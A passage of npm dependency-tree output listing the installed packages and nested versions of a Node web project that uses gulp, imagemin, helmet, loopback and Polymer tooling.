gulp-match@1.0.2\r\n| +-- ternary-stream@2.0.0\r\n| | +-- fork-stream@0.0.4\r\n| | `-- through2@2.0.1\r\n| |   `-- readable-stream@2.0.6\r\n| |     `-- isarray@1.0.0\r\n| `-- through2@2.0.1\r\n|   `-- readable-stream@2.0.6\r\n|     `-- isarray@1.0.0\r\n+-- gulp-imagemin@3.0.3\r\n| +-- imagemin@5.2.2\r\n| | +-- file-type@3.8.0\r\n| | `-- promise.pipe@3.0.0\r\n| +-- imagemin-gifsicle@5.1.0\r\n| | +-- exec-buffer@3.0.0\r\n| | | +-- execa@0.3.0\r\n| | | | +-- cross-spawn-async@2.2.4\r\n| | | | | `-- lru-cache@4.0.1\r\n| | | | +-- npm-run-path@1.0.0\r\n| | | | +-- path-key@1.0.0\r\n| | | | `-- strip-eof@1.0.0\r\n| | | `-- tempfile@1.1.1\r\n| | +-- gifsicle@3.0.4\r\n| | | +-- bin-build@2.2.0\r\n| | | | +-- archive-type@3.2.0\r\n| | | | +-- decompress@3.0.0\r\n| | | | | +-- buffer-to-vinyl@1.1.0\r\n| | | | | | +-- readable-stream@2.1.5\r\n| | | | | | | `-- isarray@1.0.0\r\n| | | | | | `-- vinyl@1.2.0\r\n| | | | | +-- decompress-tar@3.1.0\r\n| | | | | | +-- is-tar@1.0.0\r\n| | | | | | +-- object-assign@2.1.1\r\n| | | | | | +-- strip-dirs@1.1.1\r\n| | | | | | | +-- is-absolute@0.1.7\r\n| | | | | | | | `-- is-relative@0.1.3\r\n| | | | | | | +-- is-natural-number@2.1.1\r\n| | | | | | | +-- minimist@1.2.0\r\n| | | | | | | `-- sum-up@1.0.3\r\n| | | | | | +-- tar-stream@1.5.2\r\n| | | | | | | +-- bl@1.1.2\r\n| | | | | | | | `-- readable-stream@2.0.6\r\n| | | | | | | +-- end-of-stream@1.1.0\r\n| | | | | | | `-- readable-stream@2.1.5\r\n| | | | | | |   `-- isarray@1.0.0\r\n| | | | | | +-- through2@0.6.5\r\n| | | | | | `-- vinyl@0.4.6\r\n| | | | | |   `-- clone@0.2.0\r\n| | | | | +-- decompress-tarbz2@3.1.0\r\n| | | | | | +-- is-bzip2@1.0.0\r\n| | | | | | +-- object-assign@2.1.1\r\n| | | | | | +-- seek-bzip@1.0.5\r\n| | | | | | | `-- commander@2.8.1\r\n| | | | | | +-- through2@0.6.5\r\n| | | | | | `-- vinyl@0.4.6\r\n| | | | | |   `-- clone@0.2.0\r\n| | | | | +-- decompress-targz@3.1.0\r\n| | | | | | +-- is-gzip@1.0.0\r\n| | | | | | +-- object-assign@2.1.1\r\n| | | | | | +-- through2@0.6.5\r\n| | | | | | `-- vinyl@0.4.6\r\n| | | | | |   `-- clone@0.2.0\r\n| | | | | +-- decompress-unzip@3.4.0\r\n| | | | | | +-- is-zip@1.0.0\r\n| | | | | | +-- stat-mode@0.2.2\r\n| | | | | | `-- vinyl@1.2.0\r\n| | | | | +-- vinyl-assign@1.2.1\r\n| | | | | | `-- readable-stream@2.1.5\r\n| | | | | |   `-- isarray@1.0.0\r\n| | | | | `-- vinyl-fs@2.4.3\r\n| | | | |   +-- glob-stream@5.3.5\r\n| | | | |   | +-- glob@5.0.15\r\n| | | | |   | +-- glob-parent@3.0.0\r\n| | | | |   | | `-- is-glob@3.0.0\r\n| | | | |   | |   `-- is-extglob@2.0.0\r\n| | | | |   | +-- ordered-read-streams@0.3.0\r\n| | | | |   | +-- through2@0.6.5\r\n| | | | |   | | `-- readable-stream@1.0.34\r\n| | | | |   | |   `-- isarray@0.0.1\r\n| | | | |   | `-- unique-stream@2.2.1\r\n| | | | |   +-- readable-stream@2.1.5\r\n| | | | |   | `-- isarray@1.0.0\r\n| | | | |   `-- vinyl@1.2.0\r\n| | | | +-- download@4.4.3\r\n| | | | | +-- caw@1.2.0\r\n| | | | | | +-- get-proxy@1.1.0\r\n| | | | | | `-- object-assign@3.0.0\r\n| | | | | +-- filenamify@1.2.1\r\n| | | | | | +-- filename-reserved-regex@1.0.0\r\n| | | | | | +-- strip-outer@1.0.0\r\n| | | | | | `-- trim-repeated@1.0.0\r\n| | | | | +-- gulp-decompress@1.2.0\r\n| | | | | | `-- readable-stream@2.1.5\r\n| | | | | |   `-- isarray@1.0.0\r\n| | | | | +-- is-url@1.2.2\r\n| | | | | +-- read-all-stream@3.1.0\r\n| | | | | | `-- readable-stream@2.1.5\r\n| | | | | |   `-- isarray@1.0.0\r\n| | | | | +-- readable-stream@2.1.5\r\n| | | | | | `-- isarray@1.0.0\r\n| | | | | +-- vinyl@1.2.0\r\n| | | | | +-- vinyl-fs@2.4.3\r\n| | | | | | `-- glob-stream@5.3.5\r\n| | | | | |   +-- glob@5.0.15\r\n| | | | | |   +-- glob-parent@3.0.0\r\n| | | | | |   | `-- is-glob@3.0.0\r\n| | | | | |   |   `-- is-extglob@2.0.0\r\n| | | | | |   +-- ordered-read-streams@0.3.0\r\n| | | | | |   +-- through2@0.6.5\r\n| | | | | |   | `-- readable-stream@1.0.34\r\n| | | | | |   |   `-- isarray@0.0.1\r\n| | | | | |   `-- unique-stream@2.2.1\r\n| | | | | `-- ware@1.3.0\r\n| | | | |   `-- wrap-fn@0.1.5\r\n| | | | |     `-- co@3.1.0\r\n| | | | +-- exec-series@1.0.3\r\n| | | | | `-- async-each-series@1.1.0\r\n| | | | `-- url-regex@3.2.0\r\n| | | |   `-- ip-regex@1.0.3\r\n| | | +-- bin-wrapper@3.0.2\r\n| | | | +-- bin-check@2.0.0\r\n| | | | | `-- executable@1.1.0\r\n| | | | +-- bin-version-check@2.1.0\r\n| | | | | +-- bin-version@1.0.4\r\n| | | | | | `-- find-versions@1.2.1\r\n| | | | | |   `-- semver-regex@1.0.0\r\n| | | | | +-- minimist@1.2.0\r\n| | | | | `-- semver-truncate@1.1.2\r\n| | | | |   `-- semver@5.3.0\r\n| | | | +-- each-async@1.1.1\r\n| | | | | `-- onetime@1.1.0\r\n| | | | +-- lazy-req@1.1.0\r\n| | | | `-- os-filter-obj@1.0.3\r\n| | | `-- logalot@2.1.0\r\n| | |   `-- squeak@1.3.0\r\n| | |     +-- console-stream@0.1.1\r\n| | |     `-- lpad-align@1.1.0\r\n| | |       +-- longest@1.0.1\r\n| | |       `-- lpad@2.0.1\r\n| | `-- is-gif@1.0.0\r\n| +-- imagemin-jpegtran@5.0.2\r\n| | +-- is-jpg@1.0.0\r\n| | `-- jpegtran-bin@3.1.0\r\n| +-- imagemin-optipng@5.2.0\r\n| | +-- is-png@1.0.0\r\n| | `-- optipng-bin@3.1.2\r\n| +-- imagemin-svgo@5.2.0\r\n| | +-- is-svg@2.0.1\r\n| | | `-- html-comment-regex@1.1.1\r\n| | `-- svgo@0.7.0\r\n| |   +-- coa@1.0.1\r\n| |   +-- colors@1.1.2\r\n| |   +-- csso@2.2.1\r\n| |   | +-- clap@1.1.1\r\n| |   | `-- source-map@0.5.6\r\n| |   +-- sax@1.2.1\r\n| |   `-- whet.extend@0.9.9\r\n| +-- plur@2.1.2\r\n| | `-- irregular-plurals@1.2.0\r\n| +-- pretty-bytes@2.0.1\r\n| | +-- get-stdin@4.0.1\r\n| | +-- meow@3.7.0\r\n| | | +-- camelcase-keys@2.1.0\r\n| | | | `-- camelcase@2.1.1\r\n| | | +-- loud-rejection@1.6.0\r\n| | | | +-- currently-unhandled@0.4.1\r\n| | | | | `-- array-find-index@1.0.1\r\n| | | | `-- signal-exit@3.0.0\r\n| | | +-- map-obj@1.0.1\r\n| | | +-- minimist@1.2.0\r\n| | | +-- normalize-package-data@2.3.5\r\n| | | | +-- hosted-git-info@2.1.5\r\n| | | | +-- is-builtin-module@1.0.0\r\n| | | | | `-- builtin-modules@1.1.1\r\n| | | | `-- validate-npm-package-license@3.0.1\r\n| | | |   +-- spdx-correct@1.0.2\r\n| | | |   | `-- spdx-license-ids@1.2.2\r\n| | | |   `-- spdx-expression-parse@1.0.3\r\n| | | +-- redent@1.0.0\r\n| | | | +-- indent-string@2.1.0\r\n| | | | `-- strip-indent@1.0.1\r\n| | | `-- trim-newlines@1.0.0\r\n| | `-- number-is-nan@1.0.0\r\n| `-- through2-concurrent@1.1.1\r\n+-- gulp-load-plugins@1.2.4\r\n| +-- array-unique@0.2.1\r\n| +-- fancy-log@1.2.0\r\n| | `-- time-stamp@1.0.1\r\n| +-- findup-sync@0.4.2\r\n| | +-- detect-file@0.1.0\r\n| | | `-- fs-exists-sync@0.1.0\r\n| | `-- resolve-dir@0.1.1\r\n| |   `-- global-modules@0.2.3\r\n| |     +-- global-prefix@0.1.4\r\n| |     | `-- ini@1.3.4\r\n| |     `-- is-windows@0.2.0\r\n| +-- gulplog@1.0.0\r\n| | `-- glogg@1.0.0\r\n| +-- has-gulplog@0.1.0\r\n| | `-- sparkles@1.0.0\r\n| `-- resolve@1.1.7\r\n+-- gulp-minify-css@1.2.4\r\n| +-- clean-css@3.4.19\r\n| | +-- commander@2.8.1\r\n| | | `-- graceful-readlink@1.0.1\r\n| | `-- source-map@0.4.4\r\n| |   `-- amdefine@1.0.0\r\n| +-- readable-stream@2.1.5\r\n| | `-- isarray@1.0.0\r\n| `-- vinyl-bufferstream@1.0.1\r\n|   `-- bufferstreams@1.0.1\r\n+-- gulp-minify-html@1.0.6\r\n| +-- minimize@1.8.1\r\n| | +-- argh@0.1.4\r\n| | +-- async@1.5.2\r\n| | +-- cli-color@1.1.0\r\n| | | +-- d@0.1.1\r\n| | | +-- es5-ext@0.10.12\r\n| | | +-- es6-iterator@2.0.0\r\n| | | +-- memoizee@0.3.10\r\n| | | | +-- es6-weak-map@0.1.4\r\n| | | | | +-- es6-iterator@0.1.3\r\n| | | | | `-- es6-symbol@2.0.1\r\n| | | | +-- lru-queue@0.1.0\r\n| | | | `-- next-tick@0.2.2\r\n| | | `-- timers-ext@0.1.0\r\n| | +-- diagnostics@1.0.1\r\n| | | +-- colorspace@1.0.1\r\n| | | | +-- color@0.8.0\r\n| | | | | +-- color-convert@0.5.3\r\n| | | | | `-- color-string@0.3.0\r\n| | | | |   `-- color-name@1.1.1\r\n| | | | `-- text-hex@0.0.0\r\n| | | +-- enabled@1.0.2\r\n| | | | `-- env-variable@0.0.3\r\n| | | `-- kuler@0.0.0\r\n| | |   `-- colornames@0.0.2\r\n| | +-- emits@3.0.0\r\n| | `-- htmlparser2@3.9.1\r\n| |   `-- readable-stream@2.1.5\r\n| |     `-- isarray@1.0.0\r\n| `-- through2@0.6.5\r\n+-- gulp-rename@1.2.2\r\n+-- gulp-replace@0.5.4\r\n| +-- istextorbinary@1.0.2\r\n| | +-- binaryextensions@1.0.1\r\n| | `-- textextensions@1.0.2\r\n| +-- readable-stream@2.1.5\r\n| | `-- isarray@1.0.0\r\n| `-- replacestream@4.0.2\r\n|   `-- readable-stream@2.1.5\r\n|     `-- isarray@1.0.0\r\n+-- gulp-size@2.1.0\r\n| +-- gzip-size@3.0.0\r\n| | `-- duplexer@0.1.1\r\n| +-- pretty-bytes@3.0.1\r\n| +-- stream-counter@1.0.0\r\n| `-- through2@2.0.1\r\n|   `-- readable-stream@2.0.6\r\n|     `-- isarray@1.0.0\r\n+-- gulp-uglify@2.0.0\r\n| +-- make-error-cause@1.2.1\r\n| | `-- make-error@1.2.1\r\n| +-- uglify-js@2.7.0\r\n| | +-- async@0.2.10\r\n| | +-- source-map@0.5.6\r\n| | +-- uglify-to-browserify@1.0.2\r\n| | `-- yargs@3.10.0\r\n| |   +-- cliui@2.1.0\r\n| |   | +-- center-align@0.1.3\r\n| |   | | +-- align-text@0.1.4\r\n| |   | | `-- lazy-cache@1.0.4\r\n| |   | +-- right-align@0.1.3\r\n| |   | `-- wordwrap@0.0.2\r\n| |   `-- window-size@0.1.0\r\n| `-- uglify-save-license@0.4.1\r\n+-- gulp-useref@3.1.2\r\n| +-- event-stream@3.3.4\r\n| | +-- duplexer@0.1.1\r\n| | +-- from@0.1.3\r\n| | +-- map-stream@0.1.0\r\n| | +-- pause-stream@0.0.11\r\n| | +-- split@0.3.3\r\n| | `-- stream-combiner@0.0.4\r\n| +-- gulp-concat@2.6.0\r\n| | +-- concat-with-sourcemaps@1.0.4\r\n| | | `-- source-map@0.5.6\r\n| | `-- through2@0.6.5\r\n| +-- is-relative-url@1.0.0\r\n| | `-- is-absolute-url@1.0.0\r\n| +-- useref@1.2.0\r\n| `-- vinyl-fs@2.4.3\r\n|   +-- glob-stream@5.3.5\r\n|   | +-- glob@5.0.15\r\n|   | +-- glob-parent@3.0.0\r\n|   | | `-- is-glob@3.0.0\r\n|   | |   `-- is-extglob@2.0.0\r\n|   | +-- ordered-read-streams@0.3.0\r\n|   | +-- through2@0.6.5\r\n|   | | `-- readable-stream@1.0.34\r\n|   | |   `-- isarray@0.0.1\r\n|   | `-- unique-stream@2.2.1\r\n|   +-- readable-stream@2.1.5\r\n|   | `-- isarray@1.0.0\r\n|   `-- vinyl@1.2.0\r\n+-- gulp-vulcanize@6.1.0\r\n| `-- through2@2.0.1\r\n|   `-- readable-stream@2.0.6\r\n|     `-- isarray@1.0.0\r\n+-- helmet@2.1.3\r\n| +-- connect@3.4.1\r\n| | `-- finalhandler@0.4.1\r\n| +-- dns-prefetch-control@0.1.0\r\n| +-- dont-sniff-mimetype@1.0.0\r\n| +-- frameguard@2.0.0\r\n| +-- helmet-csp@1.2.2\r\n| | +-- camelize@1.0.0\r\n| | +-- content-security-policy-builder@1.0.0\r\n| | | `-- dashify@0.2.2\r\n| | +-- lodash.reduce@4.5.0\r\n| | `-- platform@1.3.1\r\n| +-- hide-powered-by@1.0.0\r\n| +-- hpkp@1.1.0\r\n| +-- hsts@1.0.0\r\n| +-- ienoopen@1.0.0\r\n| +-- nocache@1.0.1\r\n| `-- x-xss-protection@1.0.0\r\n+-- jackrabbit@4.3.0\r\n| +-- amqplib@0.4.0\r\n| | +-- bitsyntax@0.0.4\r\n| | +-- buffer-more-ints@0.0.2\r\n| | +-- readable-stream@1.1.14\r\n| | `-- when@3.6.4\r\n| +-- lodash@3.10.1\r\n| `-- node-uuid@1.4.7\r\n+-- lodash@4.15.0\r\n+-- loopback@2.32.0\r\n| +-- async@2.0.1\r\n| +-- canonical-json@0.0.4\r\n| +-- cookie-parser@1.4.3\r\n| | +-- cookie@0.3.1\r\n| | `-- cookie-signature@1.0.6\r\n| +-- depd@1.1.0\r\n| +-- ejs@2.5.1\r\n| +-- express@4.14.0\r\n| | +-- array-flatten@1.1.1\r\n| | +-- content-disposition@0.5.1\r\n| | +-- finalhandler@0.5.0\r\n| | +-- merge-descriptors@1.0.1\r\n| | +-- methods@1.1.2\r\n| | +-- path-to-regexp@0.1.7\r\n| | +-- proxy-addr@1.1.2\r\n| | | +-- forwarded@0.1.0\r\n| | | `-- ipaddr.js@1.1.1\r\n| | +-- qs@6.2.0\r\n| | `-- range-parser@1.2.0\r\n| +-- inflection@1.10.0\r\n| +-- loopback-connector-remote@1.3.3\r\n| +-- loopback-context@1.0.0\r\n| | `-- continuation-local-storage@3.1.7\r\n| |   +-- async-listener@0.6.3\r\n| |   | `-- shimmer@1.0.0\r\n| |   `-- emitter-listener@1.0.1\r\n| +-- loopback-phase@1.4.0\r\n| | `-- async@0.9.2\r\n| +-- nodemailer@2.6.0\r\n| | +-- libmime@2.1.0\r\n| | | +-- libbase64@0.1.0\r\n| | | `-- libqp@1.1.0\r\n| | +-- mailcomposer@3.12.0\r\n| | | `-- buildmail@3.10.0\r\n| | |   `-- addressparser@1.0.1\r\n| | +-- nodemailer-direct-transport@3.3.2\r\n| | | `-- smtp-connection@2.12.0\r\n| | |   `-- httpntlm@1.6.1\r\n| | |     `-- httpreq@0.4.22\r\n| | +-- nodemailer-shared@1.1.0\r\n| | | `-- nodemailer-fetch@1.6.0\r\n| | +-- nodemailer-smtp-pool@2.8.2\r\n| | | `-- nodemailer-wellknown@0.1.10\r\n| | +-- nodemailer-smtp-transport@2.7.2\r\n| | `-- socks@1.1.9\r\n| |   +-- ip@1.1.3\r\n| |   `-- smart-buffer@1.0.11\r\n| +-- nodemailer-stub-transport@1.1.0\r\n| +-- stable@0.1.5\r\n| +-- strong-globalize@2.6.10\r\n| | +-- async@1.5.2\r\n| | +-- esprima@2.7.3\r\n| | +-- estraverse@4.2.0\r\n| | +-- fs-sync@1.0.2\r\n| | | +-- glob@4.5.3\r\n| | | | `-- minimatch@2.0.10\r\n| | | +-- iconv-lite@0.2.11\r\n| | | `-- mkdirp@0.3.5\r\n| | +-- g11n-pipeline@1.2.3\r\n| | | `-- swagger-client@2.1.18\r\n| | |   +-- btoa@1.1.2\r\n| | |   +-- cookiejar@2.1.0\r\n| | |   +-- lodash-compat@3.10.2\r\n| | |   `-- superagent@1.8.4\r\n| | |     +-- component-emitter@1.2.1\r\n| | |     +-- cookiejar@2.0.6\r\n| | |     +-- form-data@1.0.0-rc3\r\n| | |     | +-- async@1.5.2\r\n| | |     | +-- combined-stream@1.0.5\r\n| | |     | | `-- delayed-stream@1.0.0\r\n| | |     | `-- mime-types@2.1.11\r\n| | |     |   `-- mime-db@1.23.0\r\n| | |     +-- mime@1.3.4\r\n| | |     `-- readable-stream@1.0.27-1\r\n| | +-- md5@2.2.1\r\n| | | +-- charenc@0.0.1\r\n| | | `-- crypt@0.0.1\r\n| | +-- mktmpdir@0.1.1\r\n| | | `-- rimraf@2.2.8\r\n| | +-- optional@0.1.3\r\n| | +-- posix-getopt@1.2.0\r\n| | +-- word-count@0.2.2\r\n| | `-- yamljs@0.2.8\r\n| |   `-- argparse@1.0.7\r\n| +-- strong-remoting@2.31.0\r\n| | +-- async@2.0.1\r\n| | +-- eventemitter2@2.1.1\r\n| | +-- jayson@1.2.2\r\n| | | +-- commander@1.3.2\r\n| | | | `-- keypress@0.1.0\r\n| | | `-- lodash@3.6.0\r\n| | +-- js2xmlparser@1.0.0\r\n| | +-- mux-demux@3.7.9\r\n| | | +-- duplex@1.0.0\r\n| | | +-- json-buffer@2.0.11\r\n| | | +-- msgpack-stream@0.0.12\r\n| | | | +-- bops@0.0.6\r\n| | | | | +-- base64-js@0.0.2\r\n| | | | | `-- to-utf8@0.0.1\r\n| | | | +-- msgpack-js@0.3.0\r\n| | | | `-- through@2.3.4\r\n| | | +-- stream-combiner@0.0.2\r\n| | | | `-- duplexer@0.0.4\r\n| | | +-- stream-serializer@1.1.2\r\n| | | `-- xtend@1.0.3\r\n| | +-- qs@6.2.1\r\n| | +-- request@2.74.0\r\n| | | +-- aws-sign2@0.6.0\r\n| | | +-- aws4@1.4.1\r\n| | | +-- bl@1.1.2\r\n| | | | `-- readable-stream@2.0.6\r\n| | | |   `-- isarray@1.0.0\r\n| | | +-- caseless@0.11.0\r\n| | | +-- combined-stream@1.0.5\r\n| | | | `-- delayed-stream@1.0.0\r\n| | | +-- forever-agent@0.6.1\r\n| | | +-- form-data@1.0.1\r\n| | | +-- hawk@3.1.3\r\n| | | | +-- boom@2.10.1\r\n| | | | +-- cryptiles@2.0.5\r\n| | | | +-- hoek@2.16.3\r\n| | | | `-- sntp@1.0.9\r\n| | | +-- http-signature@1.1.1\r\n| | | | +-- assert-plus@0.2.0\r\n| | | | +-- jsprim@1.3.0\r\n| | | | | +-- extsprintf@1.0.2\r\n| | | | | +-- json-schema@0.2.2\r\n| | | | | `-- verror@1.3.6\r\n| | | | `-- sshpk@1.10.0\r\n| | | |   +-- asn1@0.2.3\r\n| | | |   +-- assert-plus@1.0.0\r\n| | | |   +-- bcrypt-pbkdf@1.0.0\r\n| | | |   | `-- tweetnacl@0.14.3\r\n| | | |   +-- dashdash@1.14.0\r\n| | | |   | `-- assert-plus@1.0.0\r\n| | | |   +-- ecc-jsbn@0.1.1\r\n| | | |   +-- getpass@0.1.6\r\n| | | |   | `-- assert-plus@1.0.0\r\n| | | |   +-- jodid25519@1.0.2\r\n| | | |   +-- jsbn@0.1.0\r\n| | | |   `-- tweetnacl@0.13.3\r\n| | | +-- is-typedarray@1.0.0\r\n| | | +-- mime-types@2.1.11\r\n| | | | `-- mime-db@1.23.0\r\n| | | `-- oauth-sign@0.8.2\r\n| | +-- sse@0.0.6\r\n| | | `-- options@0.0.6\r\n| | `-- xml2js@0.4.17\r\n| |   `-- xmlbuilder@4.2.1\r\n| +-- uid2@0.0.3\r\n| `-- underscore.string@3.3.4\r\n|   `-- sprintf-js@1.0.3\r\n+-- loopback-boot@2.22.0\r\n| +-- async@0.9.2\r\n| +-- commondir@0.0.1\r\n| +-- lodash@3.10.1\r\n| `-- toposort@0.2.12\r\n+-- loopback-component-explorer@2.6.0\r\n| +-- lodash@3.10.1\r\n| +-- loopback-swagger@2.5.0\r\n| | +-- async@1.5.2\r\n| | +-- ejs@1.0.0\r\n| | +-- lodash@3.10.1\r\n| | `-- underscore.string@2.3.3\r\n| `-- strong-swagger-ui@21.0.2\r\n+-- loopback-connector-mongodb@1.15.2\r\n| +-- async@1.5.2\r\n| +-- loopback-connector@2.4.0\r\n| | `-- async@1.5.2\r\n| `-- mongodb@2.2.9\r\n|   +-- mongodb-core@2.0.11\r\n|   | +-- bson@0.5.4\r\n|   | `-- require_optional@1.0.0\r\n|   |   +-- resolve-from@2.0.0\r\n|   |   `-- semver@5.3.0\r\n|   `-- readable-stream@2.1.5\r\n|     `-- isarray@1.0.0\r\n+-- loopback-datasource-juggler@2.50.0\r\n| +-- async@1.0.0\r\n| +-- eslint@2.13.1\r\n| | +-- doctrine@1.3.0\r\n| | | `-- isarray@1.0.0\r\n| | +-- es6-map@0.1.4\r\n| | | +-- es6-set@0.1.4\r\n| | | +-- es6-symbol@3.1.0\r\n| | | `-- event-emitter@0.3.4\r\n| | +-- escope@3.6.0\r\n| | | +-- es6-weak-map@2.0.1\r\n| | | `-- esrecurse@4.1.0\r\n| | |   `-- estraverse@4.1.1\r\n| | +-- espree@3.1.7\r\n| | | +-- acorn@3.3.0\r\n| | | `-- acorn-jsx@3.0.1\r\n| | +-- esutils@2.0.2\r\n| | +-- file-entry-cache@1.3.1\r\n| | | `-- flat-cache@1.2.1\r\n| | |   +-- circular-json@0.3.1\r\n| | |   `-- write@0.2.1\r\n| | +-- globals@9.9.0\r\n| | +-- ignore@3.1.5\r\n| | +-- imurmurhash@0.1.4\r\n| | +-- inquirer@0.12.0\r\n| | | +-- ansi-escapes@1.4.0\r\n| | | +-- cli-cursor@1.0.2\r\n| | | | `-- restore-cursor@1.0.1\r\n| | | |   `-- exit-hook@1.1.1\r\n| | | +-- cli-width@2.1.0\r\n| | | +-- figures@1.7.0\r\n| | | +-- readline2@1.0.1\r\n| | | | `-- mute-stream@0.0.5\r\n| | | +-- run-async@0.1.0\r\n| | | `-- rx-lite@3.1.2\r\n| | +-- is-my-json-valid@2.13.1\r\n| | | +-- generate-function@2.0.0\r\n| | | +-- generate-object-property@1.2.0\r\n| | | | `-- is-property@1.0.2\r\n| | | `-- jsonpointer@2.0.0\r\n| | +-- is-resolvable@1.0.0\r\n| | | `-- tryit@1.0.2\r\n| | +-- js-yaml@3.6.1\r\n| | +-- json-stable-stringify@1.0.1\r\n| | +-- levn@0.3.0\r\n| | | +-- prelude-ls@1.1.2\r\n| | | `-- type-check@0.3.2\r\n| | +-- optionator@0.8.1\r\n| | | +-- deep-is@0.1.3\r\n| | | +-- fast-levenshtein@1.1.4\r\n| | | `-- wordwrap@1.0.0\r\n| | +-- path-is-inside@1.0.1\r\n| | +-- pluralize@1.2.1\r\n| | +-- progress@1.1.8\r\n| | +-- require-uncached@1.0.2\r\n| | | +-- caller-path@0.1.0\r\n| | | | `-- callsites@0.2.0\r\n| | | `-- resolve-from@1.0.1\r\n| | +-- shelljs@0.6.1\r\n| | +-- strip-json-comments@1.0.4\r\n| | +-- table@3.7.8\r\n| | | +-- slice-ansi@0.0.4\r\n| | | +-- tv4@1.2.7\r\n| | | `-- xregexp@3.1.1\r\n| | +-- text-table@0.2.0\r\n| | `-- user-home@2.0.0\r\n| +-- minimatch@3.0.3\r\n| | `-- brace-expansion@1.1.6\r\n| |   +-- balanced-match@0.4.2\r\n| |   `-- concat-map@0.0.1\r\n| +-- qs@3.1.0\r\n| `-- traverse@0.6.6\r\n+-- loopback-testing@1.3.0\r\n| +-- async@0.9.2\r\n| +-- chai@1.10.0\r\n| | +-- assertion-error@1.0.0\r\n| | `-- deep-eql@0.1.3\r\n| |   `-- type-detect@0.1.1\r\n| `-- supertest@0.13.0\r\n|   +-- methods@1.0.0\r\n|   `-- superagent@0.18.0\r\n|     +-- component-emitter@1.1.2\r\n|     +-- cookiejar@1.3.2\r\n|     +-- debug@0.7.4\r\n|     +-- extend@1.2.1\r\n|     +-- form-data@0.1.2\r\n|     | +-- async@0.2.10\r\n|     | `-- mime@1.2.11\r\n|     +-- formidable@1.0.14\r\n|     +-- methods@0.0.1\r\n|     +-- mime@1.2.5\r\n|     +-- qs@0.6.6\r\n|     +-- readable-stream@1.0.27-1\r\n|     `-- reduce-component@1.0.1\r\n+-- merge-stream@1.0.0\r\n| `-- readable-stream@2.1.5\r\n|   `-- isarray@1.0.0\r\n+-- proquint@0.0.1\r\n+-- require-dir@0.3.0\r\n+-- run-sequence@1.2.2\r\n+-- serve-favicon@2.3.0\r\n| +-- etag@1.7.0\r\n| +-- fresh@0.3.0\r\n| +-- ms@0.7.1\r\n| `-- parseurl@1.3.1\r\n+-- vulcanize@1.14.8\r\n| +-- dom5@1.3.4\r\n| | +-- @types/clone@0.1.29\r\n| | +-- @types/node@4.0.30\r\n| | +-- @types/parse5@0.0.31\r\n| | | `-- @types/node@6.0.38\r\n| | `-- parse5@1.5.1\r\n| +-- es6-promise@2.3.0\r\n| +-- hydrolysis@1.24.1\r\n| | +-- babel-polyfill@6.13.0\r\n| | | +-- babel-runtime@6.11.6\r\n| | | +-- core-js@2.4.1\r\n| | | `-- regenerator-runtime@0.9.5\r\n| | +-- doctrine@0.7.2\r\n| | | `-- esutils@1.1.6\r\n| | +-- escodegen@1.8.1\r\n| | | +-- estraverse@1.9.3\r\n| | | +-- esutils@2.0.2\r\n| | | `-- source-map@0.2.0\r\n| | `-- estraverse@3.1.0\r\n| +-- nopt@3.0.6\r\n| | `-- abbrev@1.0.9\r\n| +-- path-posix@1.0.0\r\n| `-- update-notifier@0.6.3\r\n|   +-- boxen@0.3.1\r\n|   | +-- filled-array@1.1.0\r\n|   | +-- repeating@2.0.1\r\n|   | | `-- is-finite@1.0.1\r\n|   | `-- widest-line@1.0.0\r\n|   +-- configstore@2.1.0\r\n|   | +-- dot-prop@3.0.0\r\n|   | | `-- is-obj@1.0.1\r\n|   | +-- os-tmpdir@1.0.1\r\n|   | +-- osenv@0.1.3\r\n|   | +-- write-file-atomic@1.2.0\r\n|   | | `-- slide@1.1.6\r\n|   | `-- xdg-basedir@2.0.0\r\n|   +-- is-npm@1.0.0\r\n|   +-- latest-version@2.0.0\r\n|   | `-- package-json@2.4.0\r\n|   |   +-- got@5.6.0\r\n|   |   | +-- create-error-class@3.0.2\r\n|   |   | | `-- capture-stack-trace@1.0.0\r\n|   |   | +-- duplexer2@0.1.4\r\n|   |   | +-- is-plain-obj@1.1.0\r\n|   |   | +-- is-redirect@1.0.0\r\n|   |   | +-- is-retry-allowed@1.1.0\r\n|   |   | +-- lowercase-keys@1.0.0\r\n|   |   | +-- node-status-codes@1.0.0\r\n|   |   | +-- readable-stream@2.1.5\r\n|   |   | | `-- isarray@1.0.0\r\n|   |   | +-- timed-out@2.0.0\r\n|   |   | +-- unzip-response@1.0.0\r\n|   |   | `-- url-parse-lax@1.0.0\r\n|   |   |   `-- prepend-http@1.0.4\r\n|   |   +-- registry-auth-token@3.0.1\r\n|   |   | `-- rc@1.1.6\r\n|   |   |   +-- deep-extend@0.4.1\r\n|   |   |   `-- minimist@1.2.0\r\n|   |   +-- registry-url@3.1.0\r\n|   |   `-- semver@5.3.0\r\n|   `-- semver-diff@2.1.0\r\n|     `-- semver@5.3.0\r\n+-- web-component-tester@4.3.4\r\n| +-- accessibility-developer-tools@2.10.0\r\n| +-- async@1.5.2\r\n| +-- chai@3.5.0\r\n| | +-- assertion-error@1.0.2\r\n| | `-- type-detect@1.0.0\r\n| +-- cleankill@1.0.3\r\n| +-- findup-sync@0.2.1\r\n| | `-- glob@4.3.5\r\n| +-- glob@5.0.15\r\n| | `-- minimatch@2.0.10\r\n| +-- lodash@3.10.1\r\n| +-- mocha@2.5.3\r\n| | +-- commander@2.3.0\r\n| | +-- diff@1.4.0\r\n| | +-- escape-string-regexp@1.0.2\r\n| | +-- glob@3.2.11\r\n| | | `-- minimatch@0.3.0\r\n| | |   +-- lru-cache@2.7.3\r\n| | |   `-- sigmund@1.0.1\r\n| | +-- growl@1.9.2\r\n| | +-- jade@0.26.3\r\n| | | +-- commander@0.6.1\r\n| | | `-- mkdirp@0.3.0\r\n| | +-- supports-color@1.2.0\r\n| | `-- to-iso-string@0.0.2\r\n| +-- multer@1.2.0\r\n| | +-- append-field@0.1.0\r\n| | +-- busboy@0.2.13\r\n| | | +-- dicer@0.2.5\r\n| | | | +-- readable-stream@1.1.14\r\n| | | | `-- streamsearch@0.1.2\r\n| | | `-- readable-stream@1.1.14\r\n| | `-- object-assign@3.0.0\r\n| +-- nomnom@1.8.1\r\n| | +-- chalk@0.4.0\r\n| | | +-- ansi-styles@1.0.0\r\n| | | `-- strip-ansi@0.1.1\r\n| | `-- underscore@1.6.0\r\n| +-- promisify-node@0.4.0\r\n| | `-- nodegit-promise@4.0.0\r\n| |   `-- asap@2.0.4\r\n| +-- resolve@1.1.7\r\n| +-- send@0.11.1\r\n| | +-- debug@2.1.3\r\n| | +-- depd@1.0.1\r\n| | +-- destroy@1.0.3\r\n| | +-- escape-html@1.0.1\r\n| | +-- etag@1.5.1\r\n| | | `-- crc@3.2.1\r\n| | +-- 